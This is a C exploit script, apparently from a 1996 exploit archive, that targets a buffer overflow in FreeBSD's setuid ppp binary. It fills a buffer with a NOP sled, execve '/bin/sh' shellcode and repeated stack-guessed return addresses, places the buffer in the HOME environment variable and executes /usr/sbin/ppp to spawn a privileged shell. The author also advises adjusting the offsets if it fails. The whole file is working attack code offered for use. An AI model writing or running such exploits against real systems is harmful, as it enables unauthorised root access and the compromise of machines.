/*
 * Exploitation script for the ppp vulnerbility as described by
 * no one to date, this is NOT FreeBSD-SA-96:15. Works on
 * FreeBSD as tested. Mess with the numbers if it doesnt work.
 * 
 *	--Nirva 8/4/96
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE	156	/* size of the bufer to overflow */

#define OFFSET		-290	/* number of bytes to jump after the start
of the buffer */

long get_esp(void)
{
  __asm__("movl %esp,%eax\n");
}

main(int argc, char *argv[])
{
  char *buf = NULL;
  unsigned long *addr_ptr = NULL;
  char *ptr = NULL;
  char execshell[] =
    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"  /* 20 bytes */
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    /* 15 bytes, 57 total */

  int i,j;

  buf = malloc(4096);

  /* fill start of bufer with nops */

  i = BUFFER_SIZE-strlen(execshell);

  memset(buf, 0x90, i);
  ptr = buf + i;

  /* place exploit code into the buffer */

  for(i = 0; i < strlen(execshell); i++)
    *ptr++ = execshell[i];

  addr_ptr = (long *)ptr;
  for(i=0;i < (104/4); i++)
    *addr_ptr++ = get_esp() + OFFSET;

  ptr = (char *)addr_ptr;
  *ptr = 0;

  setenv("HOME", buf, 1);

  execl("/usr/sbin/ppp", "ppp", NULL);
}


/*                    www.hack.co.za              [2000]*/